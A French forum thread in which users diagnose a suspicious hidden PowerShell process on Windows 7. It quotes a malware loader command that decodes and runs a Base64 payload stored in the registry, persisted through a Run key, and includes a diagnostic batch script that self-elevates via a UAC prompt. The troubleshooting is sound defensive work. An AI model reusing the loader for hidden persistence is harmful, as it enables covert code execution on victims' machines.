IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Windows 7 Discussion :

où est le script powershell que je vois dans le gestionnaire de tâches de windows7 ?


Sujet :

Windows 7

  1. #1
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut où est le script powershell que je vois dans le gestionnaire de tâches de windows7 ?
    bonjour,

    étrangement je vois une ligne de commande powershell dans la liste des process affichés par le gestionnaire de tâches.
    je ne suis pas certain qu'il soit bénin (ce script powershell qui fonctionne en tâche de fond).
    comment le vérifier et le trouver car en sélectionnant la ligne, ça ne me donne que le chemin d'exécution de powershell et non pas du script.

    merci de votre aide.

  2. #2
    Membre expert
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Juillet 2004
    Messages
    2 725
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Sarthe (Pays de la Loire)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Juillet 2004
    Messages : 2 725
    Points : 3 338
    Points
    3 338
    Par défaut
    Bonjour à toi,

    Essaye de regarder avec ProcessExplorer
    Clic droit sur le process et properties, tu aura la command line
    Par pitié !!!! :Si vous ne savez pas faire cliquez ici !
    Citation Envoyé par Marc-L
    C'est dommage que parfois tu sois aussi lourd que tu as l'air intelligent…

  3. #3
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut
    Citation Envoyé par cerede2000 Voir le message
    Bonjour à toi,

    Essaye de regarder avec ProcessExplorer
    Clic droit sur le process et properties, tu aura la command line
    bonjour et merci pour la découverte de cet outil plus complet que le taskmanager de win7.

    ça me donne cette ligne :

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));
    ça vous semble suspect ou normal ?
    est-ce que ça signifie que le script est enregistré en base de registre et non pas dans un fichier ? comment le lire alors ?

  4. #4
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 839
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 839
    Points : 9 222
    Points
    9 222
    Par défaut

    Vous pouvez faire quelque chose comme ceci en batch
    Code BAT : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    @echo off
    wmic process list |find /I "Powershell.exe"
    pause

  5. #5
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 839
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 839
    Points : 9 222
    Points
    9 222
    Par défaut
    Citation Envoyé par MichaelREMY Voir le message
    bonjour et merci pour la découverte de cet outil plus complet que le taskmanager de win7.

    ça me donne cette ligne :

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));

    ça vous semble suspect ou normal ?
    est-ce que ça signifie que le script est enregistré en base de registre et non pas dans un fichier ? comment le lire alors ?
    Donc tu vois ceci et ce n'est pas toi qui exécutes ce powershell ? ==> alors ça peut-être un script suspetcs qui s'exécute en tâche de fond

    Dans ce cas, je t'invite à exécuter ce petit batch et de nous envoyer le résultat :
    Code BAT : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    @echo off
    cls & color 0A & echo.
    Mode con cols=70 lines=5
    Title Check Startup Registry Keys and Process List by Hackoo 2016
    :::::::::::::::::::::::::::::::::::::::::
    :: Automatically check & get admin rights
    :::::::::::::::::::::::::::::::::::::::::
    Set TmpLogFile=TmpLogkey.txt
    Set LogFile=Startup_key_Log.txt
    If Exist %TmpLogFile% Del %TmpLogFile%
    If Exist %LogFile% Del %LogFile%
    REM  --> Check for permissions
    Reg query "HKU\S-1-5-19\Environment" >%TmpLogFile% 2>&1
    REM --> If error flag set, we do not have admin.
    if '%errorlevel%' NEQ '0' (
    Echo.
    ECHO                 **************************************
    ECHO                  Running Admin shell... Please wait...
    ECHO                 **************************************
     
        goto UACPrompt
    ) else ( goto gotAdmin )
     
    :UACPrompt
        echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
        set params = %*:"=""
        echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"
     
        "%temp%\getadmin.vbs"
        del "%temp%\getadmin.vbs"
        exit /B
     
    :gotAdmin
     
    ::::::::::::::::::::::::::::
    ::START
    ::::::::::::::::::::::::::::
    Set mykey="HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"^
    ^ "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"^
    ^ "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"^
    ^ "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"^
    ^ "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"^
    ^ "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options"
     
    Echo.
    ECHO                 **************************************
    ECHO                        Please wait..........
    ECHO                 **************************************
     
    For %%K in (%mykey%) Do Call :Check_Key %%K %TmpLogFile%
     
    (
    Echo.
    Echo ******************************************************************************
    echo "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
    Dir /b "%ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup"
    Echo.
    Echo ******************************************************************************
    Echo.
    TASKLIST /V /FO List
    Echo.
    Echo ******************************************************************************
    )>>%TmpLogFile% 2>&1
    (
    Echo ******************************************************************************
    Echo                              STARTUP List
    Echo ******************************************************************************
    )>>%TmpLogFile% 2>&1
    REM Command suggested by FreeBooter
    wmic /APPEND:%TmpLogFile% STARTUP get /format:list>Nul
    (
    Echo.
    Echo ******************************************************************************
    Echo                               Process List
    Echo ******************************************************************************
    )>>%TmpLogFile% 2>&1
    rem WMIC /APPEND:%TmpLogFile% PROCESS GET Caption,CommandLine>Nul
    powershell.exe Get-WmiObject Win32_Process ^| select ProcessID,ProcessName,Handle,commandline,ExecutablePath ^| Out-File -Append %TmpLogFile% -Encoding ascii
    (
    Echo.
    Echo ******************************************************************************
    Echo                            Scheduled task list
    Echo ******************************************************************************
    Schtasks /query /fo LIST
    )>>%TmpLogFile% 2>&1
     
    Cmd /U /C Type %TmpLogFile% > %LogFile%
    Start "" %LogFile%
    Exit /b
     
    :Check_Key
    reg QUERY %1 >nul 2>&1
    (
        if %errorlevel% equ 0 ( reg QUERY %1 /s
            ) else ( echo %1 ===^> Not found
        )
    ) >>%2 2>&1

  6. #6
    Membre expert
    Homme Profil pro
    Architecte de système d'information
    Inscrit en
    Juillet 2004
    Messages
    2 725
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 37
    Localisation : France, Sarthe (Pays de la Loire)

    Informations professionnelles :
    Activité : Architecte de système d'information

    Informations forums :
    Inscription : Juillet 2004
    Messages : 2 725
    Points : 3 338
    Points
    3 338
    Par défaut
    Tien c'est marrant Hackoo tu as ouvert un sujet sur Stackoverflow....

    En effet curieux ce truc....

    Ce qui est sur ce que ce que fais le script est plus que suspect !
    Il chercher à lancer avec Invoke-Expression (iex) une programme dans le chemin est placé dans la clé registre :
    HKCU:\Software\Classes\ZXWNMNLIMAGAL
    Valeur : LOOTDA

    Je te conseille d'aller voir dans le registre déjà ce que contient cette valeur
    En sachant qu'elle est encodée en Base64, colle la ici on va la décrypter.
    Par pitié !!!! :Si vous ne savez pas faire cliquez ici !
    Citation Envoyé par Marc-L
    C'est dommage que parfois tu sois aussi lourd que tu as l'air intelligent…

  7. #7
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 839
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 48
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 839
    Points : 9 222
    Points
    9 222
    Par défaut
    Citation Envoyé par cerede2000 Voir le message
    Tien c'est marrant Hackoo tu as ouvert un sujet sur Stackoverflow....

    En effet curieux ce truc....

    Ce qui est sur ce que ce que fais le script est plus que suspect !
    Il chercher à lancer avec Invoke-Expression (iex) une programme dans le chemin est placé dans la clé registre :
    HKCU:\Software\Classes\ZXWNMNLIMAGAL
    Valeur : LOOTDA

    Je te conseille d'aller voir dans le registre déjà ce que contient cette valeur
    En sachant qu'elle est encodée en Base64, colle la ici on va la décrypter.
    Eh oui car je débute encore dans le powershell mais mon intution me dit que c'est virus encodé !
    Donc, je crois, qu'il faut lire son contenu à partir de la base de registre et le décoder. mais ceci j'ai aucune idée pour ce genre de décodage c'est nouveau pour moi

  8. #8
    Membre éclairé
    Homme Profil pro
    nop
    Inscrit en
    Mars 2015
    Messages
    436
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Somme (Picardie)

    Informations professionnelles :
    Activité : nop
    Secteur : High Tech - Multimédia et Internet

    Informations forums :
    Inscription : Mars 2015
    Messages : 436
    Points : 658
    Points
    658
    Par défaut
    Dans ce cas, je t'invite à exécuter ce petit batch et de nous envoyer le résultat :
    voiçi le résultat, par contre avant j'avais killé le process par doute (je cherche depuis longtemps un truc suspect sur ma machine qui envoie des mails en mon absence via outlook 2010 à mes addresses de contacts et uniquement par le biais de mon 1er compte mail) :


    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    201
    202
    203
    204
    205
    206
    207
    208
    209
    210
    211
    212
    213
    214
    215
    216
    217
    218
    219
    220
    221
    222
    223
    224
    225
    226
    227
    228
    229
    230
    231
    232
    233
    234
    235
    236
    237
    238
    239
    240
    241
    242
    243
    244
    245
    246
    247
    248
    249
    250
    251
    252
    253
    254
    255
    256
    257
    258
    259
    260
    261
    262
    263
    264
    265
    266
    267
    268
    269
    270
    271
    272
    273
    274
    275
    276
    277
    278
    279
    280
    281
    282
    283
    284
    285
    286
    287
    288
    289
    290
    291
    292
    293
    294
    295
    296
    297
    298
    299
    300
    301
    302
    303
    304
    305
    306
    307
    308
    309
    310
    311
    312
    313
    314
    315
    316
    317
    318
    319
    320
    321
    322
    323
    324
    325
    326
    327
    328
    329
    330
    331
    332
    333
    334
    335
    336
    337
    338
    339
    340
    341
    342
    343
    344
    345
    346
    347
    348
    349
    350
    351
    352
    353
    354
    355
    356
    357
    358
    359
    360
    361
    362
    363
    364
    365
    366
    367
    368
    369
    370
    371
    372
    373
    374
    375
    376
    377
    378
    379
    380
    381
    382
    383
    384
    385
    386
    387
    388
    389
    390
    391
    392
    393
    394
    395
    396
    397
    398
    399
    400
    401
    402
    403
    404
    405
    406
    407
    408
    409
    410
    411
    412
    413
    414
    415
    416
    417
    418
    419
    420
    421
    422
    423
    424
    425
    426
    427
    428
    429
    430
    431
    432
    433
    434
    435
    436
    437
    438
    439
    440
    441
    442
    443
    444
    445
    446
    447
    448
    449
    450
    451
    452
    453
    454
    455
    456
    457
    458
    459
    460
    461
    462
    463
    464
    465
    466
    467
    468
    469
    470
    471
    472
    473
    474
    475
    476
    477
    478
    479
    480
    481
    482
    483
    484
    485
    486
    487
    488
    489
    490
    491
    492
    493
    494
    495
    496
    497
    498
    499
    500
    501
    502
    503
    504
    505
    506
    507
    508
    509
    510
    511
    512
    513
    514
    515
    516
    517
    518
    519
    520
    521
    522
    523
    524
    525
    526
    527
    528
    529
    530
    531
    532
    533
    534
    535
    536
    537
    538
    539
    540
    541
    542
    543
    544
    545
    546
    547
    548
    549
    550
    551
    552
    553
    554
    555
    556
    557
    558
    559
    560
    561
    562
    563
    564
    565
    566
    567
    568
    569
    570
    571
    572
    573
    574
    575
    576
    577
    578
    579
    580
    581
    582
    583
    584
    585
    586
    587
    588
    589
    590
    591
    592
    593
    594
    595
    596
    597
    598
    599
    600
    601
    602
    603
    604
    605
    606
    607
    608
    609
    610
    611
    612
    613
    614
    615
    616
    617
    618
    619
    620
    621
    622
    623
    624
    625
    626
    627
    628
    629
    630
    631
    632
    633
    634
    635
    636
    637
    638
    639
    640
    641
    642
    643
    644
    645
    646
    647
    648
    649
    650
    651
    652
    653
    654
    655
    656
    657
    658
    659
    660
    661
    662
    663
    664
    665
    666
    667
    668
    669
    670
    671
    672
    673
    674
    675
    676
    677
    678
    679
    680
    681
    682
    683
    684
    685
    686
    687
    688
    689
    690
    691
    692
    693
    694
    695
    696
    697
    698
    699
    700
    701
    702
    703
    704
    705
    706
    707
    708
    709
    710
    711
    712
    713
    714
    715
    716
    717
    718
    719
    720
    721
    722
    723
    724
    725
    726
    727
    728
    729
    730
    731
    732
    733
    734
    735
    736
    737
    738
    739
    740
    741
    742
    743
    744
    745
    746
    747
    748
    749
    750
    751
    752
    753
    754
    755
    756
    757
    758
    759
    760
    761
    762
    763
    764
    765
    766
    767
    768
    769
    770
    771
    772
    773
    774
    775
    776
    777
    778
    779
    780
    781
    782
    783
    784
    785
    786
    787
    788
    789
    790
    791
    792
    793
    794
    795
    796
    797
    798
    799
    800
    801
    802
    803
    804
    805
    806
    807
    808
    809
    810
    811
    812
    813
    814
    815
    816
    817
    818
    819
    820
    821
    822
    823
    824
    825
    826
    827
    828
    829
    830
    831
    832
    833
    834
    835
    836
    837
    838
    839
    840
    841
    842
    843
    844
    845
    846
    847
    848
    849
    850
    851
    852
    853
    854
    855
    856
    857
    858
    859
    860
    861
    862
    863
    864
    865
    866
    867
    868
    869
    870
    871
    872
    873
    874
    875
    876
    877
    878
    879
    880
    881
    882
    883
    884
    885
    886
    887
    888
    889
    890
    891
    892
    893
    894
    895
    896
    897
    898
    899
    900
    901
    902
    903
    904
    905
    906
    907
    908
    909
    910
    911
    912
    913
    914
    915
    916
    917
    918
    919
    920
    921
    922
    923
    924
    925
    926
    927
    928
    929
    930
    931
    932
    933
    934
    935
    936
    937
    938
    939
    940
    941
    942
    943
    944
    945
    946
    947
    948
    949
    950
    951
    952
    953
    954
    955
    956
    957
    958
    959
    960
    961
    962
    963
    964
    965
    966
    967
    968
    969
    970
    971
    972
    973
    974
    975
    976
    977
    978
    979
    980
    981
    982
    983
    984
    985
    986
    987
    988
    989
    990
    991
    992
    993
    994
    995
    996
    997
    998
    999
    1000
    1001
    1002
    1003
    1004
    1005
    1006
    1007
    1008
    1009
    1010
    1011
    1012
    1013
    1014
    1015
    1016
    1017
    1018
    1019
    1020
    1021
    1022
    1023
    1024
    1025
    1026
    1027
    1028
    1029
    1030
    1031
    1032
    1033
    1034
    1035
    1036
    1037
    1038
    1039
    1040
    1041
    1042
    1043
    1044
    1045
    1046
    1047
    1048
    1049
    1050
    1051
    1052
    1053
    1054
    1055
    1056
    1057
    1058
    1059
    1060
    1061
    1062
    1063
    1064
    1065
    1066
    1067
    1068
    1069
    1070
    1071
    1072
    1073
    1074
    1075
    1076
    1077
    1078
    1079
    1080
    1081
    1082
    1083
    1084
    1085
    1086
    1087
    1088
    1089
    1090
    1091
    1092
    1093
    1094
    1095
    1096
    1097
    1098
    1099
    1100
    1101
    1102
    1103
    1104
    1105
    1106
    1107
    1108
    1109
    1110
    1111
    1112
    1113
    1114
    1115
    1116
    1117
    1118
    1119
    1120
    1121
    1122
    1123
    1124
    1125
    1126
    1127
    1128
    1129
    1130
    1131
    1132
    1133
    1134
    1135
    1136
    1137
    1138
    1139
    1140
    1141
    1142
    1143
    1144
    1145
    1146
    1147
    1148
    1149
    1150
    1151
    1152
    1153
    1154
    1155
    1156
    1157
    1158
    1159
    1160
    1161
    1162
    1163
    1164
    1165
    1166
    1167
    1168
    1169
    1170
    1171
    1172
    1173
    1174
    1175
    1176
    1177
    1178
    1179
    1180
    1181
    1182
    1183
    1184
    1185
    1186
    1187
    1188
    1189
    1190
    1191
    1192
    1193
    1194
    1195
    1196
    1197
    1198
    1199
    1200
    1201
    1202
    1203
    1204
    1205
    1206
    1207
    1208
    1209
    1210
    1211
    1212
    1213
    1214
    1215
    1216
    1217
    1218
    1219
    1220
    1221
    1222
    1223
    1224
    1225
    1226
    1227
    1228
    1229
    1230
    1231
    1232
    1233
    1234
    1235
    1236
    1237
    1238
    1239
    1240
    1241
    1242
    1243
    1244
    1245
    1246
    1247
    1248
    1249
    1250
    1251
    1252
    1253
    1254
    1255
    1256
    1257
    1258
    1259
    1260
    1261
    1262
    1263
    1264
    1265
    1266
    1267
    1268
    1269
    1270
    1271
    1272
    1273
    1274
    1275
    1276
    1277
    1278
    1279
    1280
    1281
    1282
    1283
    1284
    1285
    1286
    1287
    1288
    1289
    1290
    1291
    1292
    1293
    1294
    1295
    1296
    1297
    1298
    1299
    1300
    1301
    1302
    1303
    1304
    1305
    1306
    1307
    1308
    1309
    1310
    1311
    1312
    1313
    1314
    1315
    1316
    1317
    1318
    1319
    1320
    1321
    1322
    1323
    1324
    1325
    1326
    1327
    1328
    1329
    1330
    1331
    1332
    1333
    1334
    1335
    1336
    1337
    1338
    1339
    1340
    1341
    1342
    1343
    1344
    1345
    1346
    1347
    1348
    1349
    1350
    1351
    1352
    1353
    1354
    1355
    1356
    1357
    1358
    1359
    1360
    1361
    1362
    1363
    1364
    1365
    1366
    1367
    1368
    1369
    1370
    1371
    1372
    1373
    1374
    1375
    1376
    1377
    1378
    1379
    1380
    1381
    1382
    1383
    1384
    1385
    1386
    1387
    1388
    1389
    1390
    1391
    1392
    1393
    1394
    1395
    1396
    1397
    1398
    1399
    1400
    1401
    1402
    1403
    1404
    1405
    1406
    1407
    1408
    1409
    1410
    1411
    1412
    1413
    1414
    1415
    1416
    1417
    1418
    1419
    1420
    1421
    1422
    1423
    1424
    1425
    1426
    1427
    1428
    1429
    1430
    1431
    1432
    1433
    1434
    1435
    1436
    1437
    1438
    1439
    1440
    1441
    1442
    1443
    1444
    1445
    1446
    1447
    1448
    1449
    1450
    1451
    1452
    1453
    1454
    1455
    1456
    1457
    1458
    1459
    1460
    1461
    1462
    1463
    1464
    1465
    1466
    1467
    1468
    1469
    1470
    1471
    1472
    1473
    1474
    1475
    1476
    1477
    1478
    1479
    1480
    1481
    1482
    1483
    1484
    1485
    1486
    1487
    1488
    1489
    1490
    1491
    1492
    1493
    1494
    1495
    1496
    1497
    1498
    1499
    1500
    1501
    1502
    1503
    1504
    1505
    1506
    1507
    1508
    1509
    1510
    1511
    1512
    1513
    1514
    1515
    1516
    1517
    1518
    1519
    1520
    1521
    1522
    1523
    1524
    1525
    1526
    1527
    1528
    1529
    1530
    1531
    1532
    1533
    1534
    1535
    1536
    1537
    1538
    1539
    1540
    1541
    1542
    1543
    1544
    1545
    1546
    1547
    1548
    1549
    1550
    1551
    1552
    1553
    1554
    1555
    1556
    1557
    1558
    1559
    1560
    1561
    1562
    1563
    1564
    1565
    1566
    1567
    1568
    1569
    1570
    1571
    1572
    1573
    1574
    1575
    1576
    1577
    1578
    1579
    1580
    1581
    1582
    1583
    1584
    1585
    1586
    1587
    1588
    1589
    1590
    1591
    1592
    1593
    1594
    1595
    1596
    1597
    1598
    1599
    1600
    1601
    1602
    1603
    1604
    1605
    1606
    1607
    1608
    1609
    1610
    1611
    1612
    1613
    1614
    1615
    1616
    1617
    1618
    1619
    1620
    1621
    1622
    1623
    1624
    1625
    1626
    1627
    1628
    1629
    1630
    1631
    1632
    1633
    1634
    1635
    1636
    1637
    1638
    1639
    1640
    1641
    1642
    1643
    1644
    1645
    1646
    1647
    1648
    1649
    1650
    1651
    1652
    1653
    1654
    1655
    1656
    1657
    1658
    1659
    1660
    1661
    1662
    1663
    1664
    1665
    1666
    1667
    1668
    1669
    1670
    1671
    1672
    1673
    1674
    1675
    1676
    1677
    1678
    1679
    1680
    1681
    1682
    1683
    1684
    1685
    1686
    1687
    1688
    1689
    1690
    1691
    1692
    1693
    1694
    1695
    1696
    1697
    1698
    1699
    1700
    1701
    1702
    1703
    1704
    1705
    1706
    1707
    1708
    1709
    1710
    1711
    1712
    1713
    1714
    1715
    1716
    1717
    1718
    1719
    1720
    1721
    1722
    1723
    1724
    1725
    1726
    1727
    1728
    1729
    1730
    1731
    1732
    1733
    1734
    1735
    1736
    1737
    1738
    1739
    1740
    1741
    1742
    1743
    1744
    1745
    1746
    1747
    1748
    1749
    1750
    1751
    1752
    1753
    1754
    1755
    1756
    1757
    1758
    1759
    1760
    1761
    1762
    1763
    1764
    1765
    1766
    1767
    1768
    1769
    1770
    1771
    1772
    1773
    1774
    1775
    1776
    1777
    1778
    1779
    1780
    1781
    1782
    1783
    1784
    1785
    1786
    1787
    1788
    1789
    1790
    1791
    1792
    1793
    1794
    1795
    1796
    1797
    1798
    1799
    1800
    1801
    1802
    1803
    1804
    1805
    1806
    1807
    1808
    1809
    1810
    1811
    1812
    1813
    1814
    1815
    1816
    1817
    1818
    1819
    1820
    1821
    1822
    1823
    1824
    1825
    1826
    1827
    1828
    1829
    1830
    1831
    1832
    1833
    1834
    1835
    1836
    1837
    1838
    1839
    1840
    1841
    1842
    1843
    1844
    1845
    1846
    1847
    1848
    1849
    1850
    1851
    1852
    1853
    1854
    1855
    1856
    1857
    1858
    1859
    1860
    1861
    1862
    1863
    1864
    1865
    1866
    1867
    1868
    1869
    1870
    1871
    1872
    1873
    1874
    1875
    1876
    1877
    1878
    1879
    1880
    1881
    1882
    1883
    1884
    1885
    1886
    1887
    1888
    1889
    1890
    1891
    1892
    1893
    1894
    1895
    1896
    1897
    1898
    1899
    1900
    1901
    1902
    1903
    1904
    1905
    1906
    1907
    1908
    1909
    1910
    1911
    1912
    1913
    1914
    1915
    1916
    1917
    1918
    1919
    1920
    1921
    1922
    1923
    1924
    1925
    1926
    1927
    1928
    1929
    1930
    1931
    1932
    1933
    1934
    1935
    1936
    1937
    1938
    1939
    1940
    1941
    1942
    1943
    1944
    1945
    1946
    1947
    1948
    1949
    1950
    1951
    1952
    1953
    1954
    1955
    1956
    1957
    1958
    1959
    1960
    1961
    1962
    1963
    1964
    1965
    1966
    1967
    1968
    1969
    1970
    1971
    1972
    1973
    1974
    1975
    1976
    1977
    1978
    1979
    1980
    1981
    1982
    1983
    1984
    1985
    1986
    1987
    1988
    1989
    1990
    1991
    1992
    1993
    1994
    1995
    1996
    1997
    1998
    1999
    2000
    2001
    2002
    2003
    2004
    2005
    2006
    2007
    2008
    2009
    2010
    2011
    2012
    2013
    2014
    2015
    2016
    2017
    2018
    2019
    2020
    2021
    2022
    2023
    2024
    2025
    2026
    2027
    2028
    2029
    2030
    2031
    2032
    2033
    2034
    2035
    2036
    2037
    2038
    2039
    2040
    2041
    2042
    2043
    2044
    2045
    2046
    2047
    2048
    2049
    2050
    2051
    2052
    2053
    2054
    2055
    2056
    2057
    2058
    2059
    2060
    2061
    2062
    2063
    2064
    2065
    2066
    2067
    2068
    2069
    2070
    2071
    2072
    2073
    2074
    2075
    2076
    2077
    2078
    2079
    2080
    2081
    2082
    2083
    2084
    2085
    2086
    2087
    2088
    2089
    2090
    2091
    2092
    2093
    2094
    2095
    2096
    2097
    2098
    2099
    2100
    2101
    2102
    2103
    2104
    2105
    2106
    2107
    2108
    2109
    2110
    2111
    2112
    2113
    2114
    2115
    2116
    2117
    2118
    2119
    2120
    2121
    2122
    2123
    2124
    2125
    2126
    2127
    2128
    2129
    2130
    2131
    2132
    2133
    2134
    2135
    2136
    2137
    2138
    2139
    2140
    2141
    2142
    2143
    2144
    2145
    2146
    2147
    2148
    2149
    2150
    2151
    2152
    2153
    2154
    2155
    2156
    2157
    2158
    2159
    2160
    2161
    2162
    2163
    2164
    2165
    2166
    2167
    2168
    2169
    2170
    2171
    2172
    2173
    2174
    2175
    2176
    2177
    2178
    2179
    2180
    2181
    2182
    2183
    2184
    2185
    2186
    2187
    2188
    2189
    2190
    2191
    2192
    2193
    2194
    2195
    2196
    2197
    2198
    2199
    2200
    2201
    2202
    2203
    2204
    2205
    2206
    2207
    2208
    2209
    2210
    2211
    2212
    2213
    2214
    2215
    2216
    2217
    2218
    2219
    2220
    2221
    2222
    2223
    2224
    2225
    2226
    2227
    2228
    2229
    2230
    2231
    2232
    2233
    2234
    2235
    2236
    2237
    2238
    2239
    2240
    2241
    2242
    2243
    2244
    2245
    2246
    2247
    2248
    2249
    2250
    2251
    2252
    2253
    2254
    2255
    2256
    2257
    2258
    2259
    2260
    2261
    2262
    2263
    2264
    2265
    2266
    2267
    2268
    2269
    2270
    2271
    2272
    2273
    2274
    2275
    2276
    2277
    2278
    2279
    2280
    2281
    2282
    2283
    2284
    2285
    2286
    2287
    2288
    2289
    2290
    2291
    2292
    2293
    2294
    2295
    2296
    2297
    2298
    2299
    2300
    2301
    2302
    2303
    2304
    2305
    2306
    2307
    2308
    2309
    2310
    2311
    2312
    2313
    2314
    2315
    2316
    2317
    2318
    2319
    2320
    2321
    2322
    2323
    2324
    2325
    2326
    2327
    2328
    2329
    2330
    2331
    2332
    2333
    2334
    2335
    2336
    2337
    2338
    2339
    2340
    2341
    2342
    2343
    2344
    2345
    2346
    2347
    2348
    2349
    2350
    2351
    2352
    2353
    2354
    2355
    2356
    HKEY_USERS\S-1-5-19\Environment
        TEMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
        TMP    REG_EXPAND_SZ    %USERPROFILE%\AppData\Local\Temp
    
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
        MSC    REG_SZ    "C:\Program Files\Microsoft Security Client\msseces.exe" -hide -runkey
    
    
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
        GmailNotifierPro    REG_SZ    C:\Program Files (x86)\Gmail Notifier Pro\GmailNotifierPro.exe /minimized
        AdobeBridge    REG_SZ    
        MusicManager    REG_SZ    "C:\Users\michael\AppData\Local\Programs\Google\MusicManager\MusicManager.exe"
        ACDSeeCommanderPro8    REG_SZ    C:\Program Files\ACD Systems\ACDSee Pro\8.0\ACDSeeCommanderPro8.exe
        Google Update    REG_SZ    "C:\Users\michael\AppData\Local\Google\Update\GoogleUpdate.exe" /c
        {BE9473EA-5660-4BF7-91C3-2A2258213EE1}    REG_SZ    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\ZXWNMNLIMAGAL').LOOTDA)));
    
    
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
        ReportBootOk    REG_SZ    1
        Shell    REG_SZ    explorer.exe
        PreCreateKnownFolders    REG_SZ    {A520A1A4-1780-4FF6-BD18-167343C5AF16}
        Userinit    REG_SZ    C:\Windows\system32\userinit.exe,
        VMApplet    REG_SZ    SystemPropertiesPerformance.exe /pagefile
        AutoRestartShell    REG_DWORD    0x1
        Background    REG_SZ    0 0 0
